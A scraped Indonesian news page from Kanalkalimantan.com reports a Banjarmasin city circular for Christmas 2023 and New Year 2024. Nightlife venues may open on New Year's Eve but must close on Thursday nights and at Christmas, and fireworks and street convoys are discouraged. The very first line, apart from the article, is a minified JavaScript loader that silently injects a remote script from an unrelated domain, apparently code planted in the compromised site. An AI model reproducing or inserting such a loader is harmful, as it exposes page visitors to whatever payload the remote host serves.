(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarmasin

THM di Banjarmasin Diperbolehkan Buka saat Malam Tahun Baru


KANALKALIMANTAN.COM, BANJARMASIN – Perayaan malam Tahun Baru 2024 di Banjarmasin menjadi salah satu atensi pemerintah daerah. Forkopimda Banjarmasin mengeluarkan surat edaran terkait pedoman yang didalamnya memuat instruksi saat perayaan malam pergantian tahun.

Surat edaran Nomor 200.1.3/1585-kesbangpol/2023 yang diterbitkan memuat sejumlah seruan terkait perayaan Natal 2023 dan Tahun Baru 2024 ditujukan kepada instansi pemerintah, swasta, BUMN, BUMD dan seluruh masyarakat Kota Banjarmasin.

Surat edaran mengacu pada Perda Kota Banjarmasin Nomor 12 Tahun 2016 tentang Usaha Penyelenggaraan Hiburan dan Rekreasi, serta hasil rapat koordinasi Forkopimda tanggal 27 November 2023.

Isi edaran terkait untuk perayaan malam pergantian tahun, warga dianjurkan untuk menahan diri dan lebih mengutamakan kegiatan bersifat keagamaan atau berkegitan di rumah masing-masing.

Baca juga: Melindungi Hak Adat Masyarakat Dayak Pitap Desa Kambiayian dari Incaran Pengeruk Kekayaan Pegunungan Meratus

Kemudian masyarakat diimbau tidak memperjualbelikan atau membunyikan petasan maupun kembang api.

Selain itu, melakukan konvoi atau iring-iringan motor yang menyebabkan kemacetan ataupun terganggunya lalu lintas jalan juga dilarang saat pergantian malam Tahun Baru 2024.

“Tidak melakukan konvoi dan arak-arakan di jalan raya dalam merayakan tahun baru,” bunyi surat edaran yang ditandatangani Wali Kota Banjarmasin, Ibnu Sina dan Forkopimda.

Selanjutnya untuk Tempat Hiburan Malam (THM) seperti diskotik, tempat karaoke, pub, dan rumah biliar pada saat malam tahun baru tepatnya Minggu (31/12/2023) malam diperbolehkan buka, sesuai jam operasional dari ketentuan yang berlaku.

Baca juga: Dua Kecamatan di HSU Mulai Terendam Banjir

Kecuali pada Kamis (21/12/2023) dan Kamis (28/12/2023) atau Kamis malam (Malam Jum’at) diharuskan tutup.

Kemudian saat perayaan Natal yaitu pada Minggu (24/12/2023) malam, dan Senin (25/12/2023) malam, THM juga harus tutup beroperasi.

Kemudian masyarakat diimbau Banjarmasin untuk turut serta menjaga keamanan dan ketertiban di lingkungan masing-masing. Kemudian diimbau untuk melihara kerukunan umat beragama.

Baca juga: Khidmat Perayaan Natal di Banjarmasin, Jemaat Gereja Katedral Penuh Sukacita

Di penutup surat edaran, bagi masyarakat yang menemukan pelanggaran terhadap instruksi Forkopimda tentang ketentuan perayaan Natal dan Tahun Baru dapat melaporkan ke Satpol PP Kota Banjarmasin. (Kanalkalimantan.com/rizki)

Reporter : rizki

Editor : bie


Muhammad Andi

Recent Posts

Pj Bupati Kapuas Halalbihalal Bersama Ibu-ibu Pengajian

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi menghadiri acara halalbihalal gabungan pengajian… Read More

13 menit ago

Pansus II ke KLHK, Bahas Raperda Pengakuan dan Perlindungan Masyarakat Hukum Adat

KANALKALIMANTAN.COM, KUALA KAPUAS - Panitia Khusus (Pansus) II DPRD Kabupaten Kapuas melakukan kunjungan ke Kementerian… Read More

18 menit ago

Rugikan Negara Rp1,6 Miliar, Kasus Pengemplang Pajak Dilimpahkan ke Kejari Tanbu

KANALKALIMANTAN.COM, BANJARMASIN - Seorang lelaki asal Kabupaten Tanah  Bumbu (Tanbu) Provinsi Kalimantan Selatan (Kalsel) berinisal… Read More

27 menit ago

Peternakan Babi Dekat Kampus UIN Antasari di Guntung Manggis Dikeluhkan

Pemilik Ternak Diminta Datang ke Kantor Satpol PP Banjarbaru Read More

11 jam ago

Rekayasa Pemasangan ATCS, Jalan Pangeran Suriansyah Steril Parkir dan PKL

KANALKALIMANTAN.COM, BANJARBARU - Kawasan pinggir jalan maupun median di Jalan Pangeran Suriansyah, Kota Banjarbaru, Kalimantan… Read More

13 jam ago

Pj Bupati HSU Resmikan TMMD ke-120 di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan secara resmi membuka… Read More

14 jam ago

This website uses cookies.